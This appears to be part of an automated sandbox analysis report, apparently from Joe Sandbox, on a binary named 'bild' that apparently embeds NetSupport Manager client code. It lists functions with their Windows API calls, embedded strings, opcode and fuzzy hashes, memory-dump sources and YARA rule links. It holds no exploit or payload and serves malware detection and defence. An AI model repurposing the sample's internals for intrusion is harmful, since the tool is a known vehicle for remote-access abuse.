                                                                                      • Opcode ID: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                      • Instruction ID: 26246af105c186e59b646e9f33a047c98996dcd180a805fce9500a05ed718ca0
                                                                                      • Opcode Fuzzy Hash: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                      • Instruction Fuzzy Hash: 7B21CF70F0030A67E718DB72C885BABF7F8AB4430DF804429EA2696180FB75A441CB95
                                                                                      Function 11021300 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$VisibleWindow
                                                                                      • String ID: %d,%d,%d,%d,%d,%d
                                                                                      • API String ID: 1671172596-1913222166
                                                                                      • Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                      • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                      • Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                      • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                      Function 11117000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$DeleteObject
                                                                                      • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                      • API String ID: 3011517232-3209293507
                                                                                      • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                      • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                      • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                      • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                      Function 11077200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 11077241
                                                                                      • CopyRect.USER32(?,00000004), ref: 1107726F
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077229
                                                                                      • m_hWnd, xrefs: 1107722E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2755825785-2830328467
                                                                                      • Opcode ID: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                      • Instruction ID: de278a2cd4c0b5f0839ddad857aefe36ed68345845b5ae66c69d21e7740d687e
                                                                                      • Opcode Fuzzy Hash: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                      • Instruction Fuzzy Hash: 3841A331E00A06DBCB14CE68C9C8A5EF7F1FF84344F10C569E86597644EB30E941CB58
                                                                                      Function 110D1090 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memmove.LIBCMT ref: 110D1128
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                      • API String ID: 1528188558-323366856
                                                                                      • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                      • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                      • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                      • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                      Function 110893D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,0000000E), ref: 1115FFD1
                                                                                        • Part of subcall function 1115FE60: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 1115FE98
                                                                                        • Part of subcall function 1115FE60: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 1115FED9
                                                                                        • Part of subcall function 1115FE60: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115FEFD
                                                                                        • Part of subcall function 1115FE60: RegCloseKey.ADVAPI32(?), ref: 1115FF2A
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 1115FF93
                                                                                      • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 1115FFA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                      • String ID: hhctrl.ocx
                                                                                      • API String ID: 1060647816-2298675154
                                                                                      • Opcode ID: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                      • Instruction ID: 21cf1aba31526e8ead5fc6aa4b71c903af58d6e9e090c4be98d1d971a6eb0305
                                                                                      • Opcode Fuzzy Hash: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                      • Instruction Fuzzy Hash: E911663260826B9BDB84DF65C994BDAF7A8EB4B758B41003FE521D3544EB70D844CB92
                                                                                      Function 110B91D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                      • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                      • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoMoveParametersSystemTimerWindow
                                                                                      • String ID: Max
                                                                                      • API String ID: 1521622399-2772132969
                                                                                      • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                      • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                      • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                      • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                      Function 110ED0F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(?), ref: 110ED118
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                      • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                      • API String ID: 2577986331-1331251348
                                                                                      • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                      • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                      • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                      • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                      Function 110813C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 11081417
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                      • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                      • API String ID: 2441568934-1875806619
                                                                                      • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                      • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                      • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                      • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                      Function 11061140 Relevance: 6.1, APIs: 4, Instructions: 131registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnumValue$CloseOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3785232357-0
                                                                                      • Opcode ID: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                      • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                      • Opcode Fuzzy Hash: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                      • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                      Function 110B3230 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0000002C,4012B9B4,?,?,00000000,00000000,?,Function_00182078,000000FF,?,1103D500,?,?,?,00000000,4012B9B4), ref: 110B325F
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D500,?,?,?,00000000,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B329F
                                                                                      • SetEvent.KERNEL32(?), ref: 110B331A
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B3321
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                      • String ID:
                                                                                      • API String ID: 3394196147-0
                                                                                      • Opcode ID: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
